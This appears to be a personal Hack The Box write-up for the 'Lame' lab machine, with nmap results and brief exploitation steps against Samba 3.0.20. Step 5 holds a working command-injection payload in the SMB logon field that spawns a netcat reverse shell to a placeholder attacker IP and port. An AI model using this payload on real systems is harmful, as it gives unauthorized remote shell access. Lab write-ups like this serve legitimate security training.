🌔

HTB - Lame

Jul 05, 20242 min read

Recon

  • IP: 10.10.10.3
$ nmap -sC -sV -oA ~/Document/htb/oscp/lame -Pn 10.10.10.3
21/tcp  open  ftp         syn-ack vsftpd 2.3.4        
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:       
|   STAT:         
| FTP server status:                                  
|      Connected to 10.10.16.3                        
|      Logged in as ftp                               
|      TYPE: ASCII
|      No session bandwidth limit                     
|      Session timeout in seconds is 300              
|      Control connection is plain text               
|      Data connections will be plain text            
|      vsFTPd 2.3.4 - secure, fast, stable            
|_End of status   
22/tcp  open  ssh         syn-ack OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-p   syn-ack Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)         
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:                 
|_clock-skew: mean: 2h00m22s, deviation: 2h49m45s, median: 19s           
|_smb2-security-mode: Couldn't establish a SMBv2 connection.             
| smb-os-discovery:                  
|   OS: Unix (Samba 3.0.20-Debian)   
|   Computer name: lame              
|   NetBIOS computer name:           
|   Domain name: hackthebox.gr       
|   FQDN: lame.hackthebox.gr         
|_  System time: 2023-06-17T09:25:28-04:00                               
| smb-security-mode:                                  
|   account_used: guest                               
|   authentication_level: user       
|   challenge_response: supported    
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)       
| p2p-conficker:  
|   Checking for Conficker.C or higher...             
|   Check 1 (port 59488/tcp): CLEAN (Timeout)         
|   Check 2 (port 30433/tcp): CLEAN (Timeout)         
|   Check 3 (port 40169/udp): CLEAN (Timeout)         
|   Check 4 (port 48278/udp): CLEAN (Timeout)         
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Noting:

  • Samba 3.0.20-Debian
    • Port: 445
    • DOMAIN: hackthebox.gr
    • FQDN: lame.hackthebox.gr
  • vsftpd 2.3.4 - Port: 21

Steps

  1. Samba 3.0.20-Debian vulnerable to samba 3.x_4.x user map attack
  2. smbclient -L 10.10.10.3
    • Side note: change appropriate config for smb.conf in /etc/samba,
      • user min protocol = NT1
      • user max protocol = SMB3
  3. Found /tmp
  4. smbclient \\10.10.10.3\tmp, login without password
  5. In SMB console, execute remote shell using logon "/=`nohup nc -e /bin/sh [attacker_ip] [attacker_port]`" replace both with port open on your machine
  6. #

Tips:

  • using seachsploit for fast vulns searching
  • always runs fast nmap -T5 or min pack = 10000 on all ports first (-p-)

Search

SearchSearch

Graph View

Backlinks

  • No backlinks found